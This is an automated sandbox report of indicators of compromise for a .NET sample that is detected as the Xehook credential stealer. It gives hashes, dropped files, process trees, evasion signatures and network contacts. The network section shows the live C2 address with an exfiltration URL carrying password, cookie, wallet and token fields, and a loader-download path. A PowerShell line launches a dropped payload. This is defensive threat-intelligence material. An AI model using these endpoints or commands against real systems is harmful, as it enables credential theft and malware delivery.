Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

1d0000.MSBuild.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

initial sample

Details

Filetype:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy:	5.324127622058963
Filename:	1d0000.MSBuild.exe
Filesize:	154624
MD5:	41cf033d05ae0e2c5238a7932cf2dc77
SHA1:	df885092f397a0a70f26b98c5abb35253d2cb06c
SHA256:	f307cd4cb26d2d851ca55e9ab039656247ffd3b01b89ad0dcd32adf8e689724b
SHA512:	eb1a3d4fe54c01c5ed6eb58208fed72aaf628aa6df60f5711f0e8e119a68517d7bc4112c5387858803072b144510fbd7c74f5e44853d3aefa5685979f755ef48
SSDEEP:	3072:FzFIwXIUVadV/NqI9tw5ojnsbkps3CUBB8owEKctGE:RXcV/55jnsbkps3CUBB81EK
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0..R...........q... ........@.. ....................................`................................

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Creates HTML files with .exe extension (expired dropper behavior)	Networking
Machine Learning detection for sample	AV Detection
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)	Malware Analysis System Evasion
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)	Malware Analysis System Evasion
Suspicious powershell command line found	Data Obfuscation	PowerShell
Tries to harvest and steal browser information (history, passwords, etc)	Stealing of Sensitive Information
Tries to harvest and steal ftp login credentials	Stealing of Sensitive Information	OS Credential Dumping Data from Local System
Allocates memory with a write watch (potentially for evading sandboxes)	Malware Analysis System Evasion
Contains long sleeps (>= 3 min)	Malware Analysis System Evasion
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected potential crypto function	System Summary	Archive Collected Data
Enables debug privileges	Anti Debugging
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)	Malware Analysis System Evasion
May sleep (evasive loops) to hinder dynamic analysis	Malware Analysis System Evasion
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)	Malware Analysis System Evasion
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)	Malware Analysis System Evasion	Windows Management Instrumentation Virtualization/Sandbox Evasion Security Software Discovery
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Sample file is different than original file name gathered from version info	System Summary
Uses Microsoft's Enhanced Cryptographic Provider	Cryptography	System Network Configuration Discovery Encrypted Channel
Uses code obfuscation techniques (call, push, ret)	Data Obfuscation	Obfuscated Files or Information
Contains medium sleeps (>= 30s)	Malware Analysis System Evasion
Creates files inside the user directory	System Summary	Masquerading
Creates guard pages, often used to prevent reverse engineering and debugging	Anti Debugging	Disable or Modify Tools
Disables application error messsages (SetErrorMode)	Hooking and other Techniques for Hiding and Protection
PE file has an executable .text section and no other executable section	System Summary
Parts of this applications are using the .NET runtime (Probably coded in C#)	System Summary
Queries process information (via WMI, Win32_Process)	System Summary
Queries the cryptographic machine GUID	Language, Device and Operating System Detection
Reads ini files	System Summary	File and Directory Discovery
Reads software policies	System Summary
SQL strings found in memory and binary data	System Summary
Tries to load missing DLLs	System Summary	DLL Side-Loading
URLs found in memory or binary data	Networking
Uses an in-process (OLE) Automation server	System Summary
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a COM descriptor data directory	System Summary

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1d0000.MSBuild.exe.log

CSV text

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1d0000.MSBuild.exe.log
Category:	dropped
Dump:	1d0000.MSBuild.exe.log.0.dr
ID:	dr_1
Target ID:	0
Process:	C:\Users\user\Desktop\1d0000.MSBuild.exe
Type:	CSV text
Entropy:	5.364175471524945
Encrypted:	false
Ssdeep:	24:ML9E4KQwKDE4KGKZI6Kha1qE4GIs0E4KCKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oa1qHGIs0HKCtHTHhAu
Size:	1498
Whitelisted:	false
Reputation:	moderate

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Machine Learning detection for sample	AV Detection
Sample file is different than original file name gathered from version info	System Summary
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery
PE file has an executable .text section and no other executable section	System Summary
Parts of this applications are using the .NET runtime (Probably coded in C#)	System Summary
URLs found in memory or binary data	Networking
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a COM descriptor data directory	System Summary

C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe

HTML document, Unicode text, UTF-8 text, with very long lines (18675), with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe
Category:	dropped
Dump:	X9ZLAQA9VR.exe.0.dr
ID:	dr_0
Target ID:	0
Process:	C:\Users\user\Desktop\1d0000.MSBuild.exe
Type:	HTML document, Unicode text, UTF-8 text, with very long lines (18675), with no line terminators
Entropy:	5.917803540927867
Encrypted:	false
Ssdeep:	384:lRRxpjNqsR2RRxpjNqsR6dHQvEhdePlDsU28J7u5vzfmCRdZW1ERCMiE2:rzmz6dwvS49DsJ8Bu5vzfmCR3/iE2
Size:	18680
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Creates files inside the user directory	System Summary	Masquerading
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category:	dropped
Dump:	StartupProfileData-NonInteractive.2.dr
ID:	dr_6
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	1.1940658735648508
Encrypted:	false
Ssdeep:	3:Nlllul3nqth:NllUa
Size:	64
Whitelisted:	false
Reputation:	moderate

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzaqcga.nqy.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzaqcga.nqy.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_mkzaqcga.nqy.psm1.2.dr
ID:	dr_4
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhpu5wea.rea.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhpu5wea.rea.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_rhpu5wea.rea.ps1.2.dr
ID:	dr_3
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Creates temporary files	System Summary

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Category:	dropped
Dump:	QUF1NVVHW3OTUB5EOR5A.temp.2.dr
ID:	dr_7
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.7284070018712265
Encrypted:	false
Ssdeep:	96:hEIVuCQP8zkvhkvCCtI6hd5UkwHePnd5UkBHePJ:hEIViPIVhd5Znd5CJ
Size:	6222
Whitelisted:	false
Reputation:	timeout

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QUF1NVVHW3OTUB5EOR5A.temp

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QUF1NVVHW3OTUB5EOR5A.temp
Category:	dropped
Dump:	QUF1NVVHW3OTUB5EOR5A.temp.2.dr
ID:	dr_2
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.7284070018712265
Encrypted:	false
Ssdeep:	96:hEIVuCQP8zkvhkvCCtI6hd5UkwHePnd5UkBHePJ:hEIViPIVhd5Znd5CJ
Size:	6222
Whitelisted:	false
Reputation:	timeout

C:\Windows\appcompat\Programs\Amcache.hve

MS Windows registry file, NT/2000 or above

dropped

Details

File:	C:\Windows\appcompat\Programs\Amcache.hve
Category:	dropped
Dump:	Amcache.hve.2.dr
ID:	dr_5
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	MS Windows registry file, NT/2000 or above
Entropy:	4.3693810168601965
Encrypted:	false
Ssdeep:	6144:qFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:CV1QyWWI/glMM6kF7/q
Size:	1835008
Whitelisted:	false
Reputation:	timeout

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\1d0000.MSBuild.exe

"C:\Users\user\Desktop\1d0000.MSBuild.exe"

Details

Is windows:	false
Is dropped:	false
PID:	7416
Target ID:	0
Parent PID:	4084
Name:	1d0000.MSBuild.exe
Path:	C:\Users\user\Desktop\1d0000.MSBuild.exe
Commandline:	"C:\Users\user\Desktop\1d0000.MSBuild.exe"
Size:	154624
MD5:	41CF033D05AE0E2C5238A7932CF2DC77
Time:	08:29:09
Date:	05/09/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0x1c2541e0000
Modulesize:	180224
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Yara detected Xehook Stealer	Stealing of Sensitive Information, Remote Access Functionality
Machine Learning detection for sample	AV Detection
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Sample file is different than original file name gathered from version info	System Summary
Yara detected Credential Stealer	Stealing of Sensitive Information
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery
PE file has an executable .text section and no other executable section	System Summary
Parts of this applications are using the .NET runtime (Probably coded in C#)	System Summary
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a COM descriptor data directory	System Summary

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'"

Details

Is windows:	true
Is dropped:	false
PID:	7660
Target ID:	2
Parent PID:	7416
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	08:29:20
Date:	05/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6cb6b0000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7668
Target ID:	3
Parent PID:	7660
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	08:29:20
Date:	05/09/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6ee680000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0&telegram=False&discord=False&steam=False&domaindetect=

65.109.218.88

http://65.109.218.88/

65.109.218.88

https://duckduckgo.com/chrome_newtab

unknown

https://duckduckgo.com/ac/?q=

unknown

https://www.google.com/images/branding/product/ico/googleg_lodp.ico

unknown

https://yandex.com/support/smart-captcha/problems.html?form-unique_key=225b0967-11df21d1-b52d8c2e-3d

unknown

https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=

unknown

http://upx.sf.net

unknown

http://65.109.218.88

unknown

https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=

unknown

https://www.ecosia.org/newtab/

unknown

https://disk.yandex.com/showcaptcha?cc=1&mt=1B9EC1EB36A05FF151D32C1291C255F1500AFCBC8AB90758085DF922

unknown

https://ac.ecosia.org/autocomplete?q=

unknown

https://yandex.com/support/common/browsers-settings/browsers-java-js-settings.html

unknown

https://yastatic.net/s3/home-static/_/90/9034470dfcb0bea0db29a281007b8a38.png

unknown

https://disk.yandex.com/d/hBX5q37QQyYzxw

87.250.250.50

https://disk.yandex.com(

unknown

http://disk.yandex.com

unknown

https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search

unknown

https://disk.yandex.com

unknown

http://ip-api.com/json/?fields=11827

208.95.112.1

http://65.109.218.88/xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.

unknown

http://ip-api.com

unknown

http://65.109.218.88/getloader.php?id=208

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://t.me/+w897k5UK_jIyNDgy

149.154.167.99

https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=

unknown

http://ip-api.com/line/?fields=hosting

unknown

There are 18 hidden URLs, click here to show them.

Domains

Name

Malicious

disk.yandex.com

87.250.250.50

Details

Name:	disk.yandex.com
IP:	87.250.250.50
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Suricata IDS alerts with low severity for network traffic	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

t.me

149.154.167.99

Details

Name:	t.me
IP:	149.154.167.99
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Uses secure TLS version for HTTPS connections	Compliance, Networking

ip-api.com

208.95.112.1

Details

Name:	ip-api.com
IP:	208.95.112.1
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
May check the online IP address of the machine	Networking	System Network Configuration Discovery
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

fp2e7a.wpc.phicdn.net

192.229.221.95

IPs

Domain

Country

Malicious

65.109.218.88

unknown

United States

Details

IP:	65.109.218.88
TargetID:	0
Current Path:	C:\Users\user\Desktop\1d0000.MSBuild.exe
Country:	United States
Countrycode:	USA
ASN number:	11022
ASN name:	ALABANZA-BALTUS
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
HTTP GET or POST without a user agent	Networking
Suricata IDS alerts with low severity for network traffic	Networking
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

208.95.112.1

ip-api.com

United States

87.250.250.50

disk.yandex.com

Russian Federation

Details

IP:	87.250.250.50
TargetID:	0
Current Path:	C:\Users\user\Desktop\1d0000.MSBuild.exe
Country:	Russian Federation
Countrycode:	RUS
ASN number:	13238
ASN name:	YANDEXRU
Private:	false
Domain:	disk.yandex.com

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts with low severity for network traffic	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

149.154.167.99

t.me

United Kingdom

Details

IP:	149.154.167.99
TargetID:	0
Current Path:	C:\Users\user\Desktop\1d0000.MSBuild.exe
Country:	United Kingdom
Countrycode:	GBR
ASN number:	62041
ASN name:	TELEGRAMRU
Private:	false
Domain:	t.me

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\1d0000_RASMANCS

FileDirectory

There are 4 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

1C2541E2000

unkown

page readonly

1C255E70000

trusted library allocation

page read and write

1C255FB5000

trusted library allocation

page read and write

8987EFE000

stack

page read and write

1C2541E0000

unkown

page readonly

8986FAE000

stack

page read and write

1C26E699000

heap

page read and write

8987CFE000

stack

page read and write

1C255E4A000

trusted library allocation

page read and write

1C26E6CE000

heap

page read and write

1C26E6A9000

heap

page read and write

1C256208000

trusted library allocation

page read and write

1C255EF7000

trusted library allocation

page read and write

1C255E01000

trusted library allocation

page read and write

1C26E64F000

heap

page read and write

1C2543D0000

heap

page read and write

1C26EF34000

heap

page read and write

1C26E6F0000

heap

page execute and read and write

1C270C80000

trusted library allocation

page read and write

1C254370000

heap

page read and write

1C254290000

heap

page read and write

1C26E923000

heap

page read and write

1C254685000

heap

page read and write

89877FC000

stack

page read and write

89876FE000

stack

page read and write

7FF43DCF0000

trusted library allocation

page execute and read and write

1C2543B0000

heap

page read and write

1C255EF3000

trusted library allocation

page read and write

7FFB4ACF3000

trusted library allocation

page execute and read and write

1C255E4C000

trusted library allocation

page read and write

1C26DE30000

trusted library allocation

page read and write

1C26EF7F000

heap

page read and write

7FFB4AD4C000

trusted library allocation

page execute and read and write

1C26E680000

heap

page read and write

1C255EF9000

trusted library allocation

page read and write

1C255DE0000

trusted library allocation

page read and write

8986FEF000

stack

page read and write

1C26E66B000

heap

page read and write

1C256239000

trusted library allocation

page read and write

1C255E6A000

trusted library allocation

page read and write

1C26E68E000

heap

page read and write

7FFB4AE10000

trusted library allocation

page execute and read and write

1C2544AE000

heap

page read and write

1C26F925000

heap

page read and write

7FFB4ADD6000

trusted library allocation

page execute and read and write

7FFB4AD00000

trusted library allocation

page read and write

7FFB4AEC0000

trusted library allocation

page execute and read and write

7FFB4ACF0000

trusted library allocation

page read and write

7FFB4AD0D000

trusted library allocation

page execute and read and write

89882FE000

stack

page read and write

1C2543EC000

heap

page read and write

1C26EF20000

heap

page read and write

1C255E50000

trusted library allocation

page read and write

7FFB4AED0000

trusted library allocation

page read and write

7FFB4AEA0000

trusted library allocation

page read and write

1C26E900000

heap

page read and write

89872F5000

stack

page read and write

8987FFE000

stack

page read and write

1C255ECD000

trusted library allocation

page read and write

1C265E11000

trusted library allocation

page read and write

1C2543E6000

heap

page read and write

8987BFD000

stack

page read and write

1C255E5C000

trusted library allocation

page read and write

1C255CC0000

trusted library allocation

page read and write

7FFB4AD1D000

trusted library allocation

page execute and read and write

7FFB4AEE0000

trusted library allocation

page read and write

89879FE000

stack

page read and write

1C255F39000

trusted library allocation

page read and write

1C26E6BC000

heap

page read and write

7FFB4AD14000

trusted library allocation

page read and write

1C255DF0000

heap

page read and write

1C26E608000

heap

page read and write

89880FE000

stack

page read and write

1C254680000

heap

page read and write

1C26E5D0000

heap

page read and write

1C25444E000

heap

page read and write

8987DFE000

stack

page read and write

7FFB4AD1B000

trusted library allocation

page execute and read and write

1C26E920000

heap

page read and write

1C255F63000

trusted library allocation

page read and write

1C255E58000

trusted library allocation

page read and write

1C255DD0000

heap

page execute and read and write

89883FD000

stack

page read and write

1C255F69000

trusted library allocation

page read and write

7FFB4AD03000

trusted library allocation

page read and write

7FFB4ACF2000

trusted library allocation

page read and write

89875FE000

stack

page read and write

1C26F920000

heap

page read and write

1C25444C000

heap

page read and write

1C265E0D000

trusted library allocation

page read and write

7FFB4AE90000

trusted library allocation

page read and write

1C255E63000

trusted library allocation

page read and write

1C255CE0000

trusted library allocation

page read and write

1C26E653000

heap

page read and write

1C2541E0000

unkown

page readonly

7FFB4ACFD000

trusted library allocation

page execute and read and write

1C26E606000

heap

page read and write

1C26EA1C000

heap

page read and write

7FFB4ADA6000

trusted library allocation

page read and write

1C254422000

heap

page read and write

7FFB4AEB0000

trusted library allocation

page execute and read and write

89878FE000

stack

page read and write

89874FE000

stack

page read and write

1C254390000

heap

page read and write

1C265E01000

trusted library allocation

page read and write

1C2543D5000

heap

page read and write

7FFB4AEE5000

trusted library allocation

page read and write

1C265E51000

trusted library allocation

page read and write

1C26EA10000

heap

page read and write

1C26EF62000

heap

page read and write

8987AFE000

stack

page read and write

89884FB000

stack

page read and write

1C26E6CB000

heap

page read and write

7FFB4ADAC000

trusted library allocation

page execute and read and write

1C26EF24000

heap

page read and write

7FFB4ADB0000

trusted library allocation

page execute and read and write

1C265E99000

trusted library allocation

page read and write

7FFB4ADA0000

trusted library allocation

page read and write

1C25440A000

heap

page read and write

1C255E40000

trusted library allocation

page read and write

89873FE000

stack

page read and write

7FFB4AD10000

trusted library allocation

page read and write

1C2560DB000

trusted library allocation

page read and write

1C254420000

heap

page read and write

1C2543E0000

heap

page read and write

7FFB4ACF4000

trusted library allocation

page read and write

There are 116 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
1d0000.MSBuild.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report1d0000.MSBuild.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
1d0000.MSBuild.exe